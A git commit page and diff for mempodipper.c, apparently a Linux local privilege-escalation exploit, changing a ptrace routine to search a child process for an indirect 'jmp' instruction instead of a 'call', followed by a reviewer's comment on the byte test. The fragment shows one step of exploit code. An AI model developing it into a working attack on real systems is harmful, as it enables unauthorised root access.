author | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-01-24 17:38:32 +0100 |
---|---|---|
committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-01-24 18:12:08 +0100 |
commit | 513018e62ef0ef9a309299e1a7dcc0c0c3eb1b7d (patch) | |
tree | 8d22ee73ab5d88ec5fae5b661b3795cb95eb870b /mempodipper.c | |
parent | Not always exit@plt (diff) | |
Search for IP of next jmp instead.
Diffstat (limited to 'mempodipper.c')
-rw-r--r-- | mempodipper.c | 10 |
1 files changed, 3 insertions, 7 deletions
diff --git a/mempodipper.c b/mempodipper.c
index dcc037c..e35d62a 100644
--- a/mempodipper.c
+++ b/mempodipper.c
@@ -17,7 +17,6 @@
 #define _LARGEFILE64_SOURCE
 #include <stdio.h>
-#include <stdint.h>
 #include <string.h>
 #include <stdlib.h>
 #include <sys/types.h>
@@ -126,12 +125,9 @@ unsigned long ptrace_address()
 #error "That platform is not supported."
 #endif
 if (instruction_pointer < upper_bound) {
- uint32_t instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
- int operator = instruction & 0xFF;
- if (operator == 0xe8 /* call */) {
- int32_t offset = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer + 1, NULL) + 5;
- return instruction_pointer + offset;
- }
+ unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
+ if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */)
+ return instruction_pointer;
 }
 }
 } else {
|
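Review bot: The test `(instruction & 0xffff) == 0x25ff` in the second hunk is under-documented and its `/* jmp r/m32 */` comment is imprecise. It matches the byte pair `ff 25` only because PTRACE_PEEKTEXT returns a native word and x86 is little-endian, and `ff 25` is the one ModRM form that jumps through a 32-bit displacement (absolute on i386, RIP-relative on x86-64), not every `jmp r/m32`. I would give the constant a name and reword the comment as `/* low two bytes ff 25: indirect jmp through a 32-bit displacement */`. A second comment should say that a failed peek returns -1, which can never equal 0x25ff, so an error is silently treated as "no match" rather than reported. ptrace_address() begins and ends outside the hunk, so how the returned address is used is not visible here.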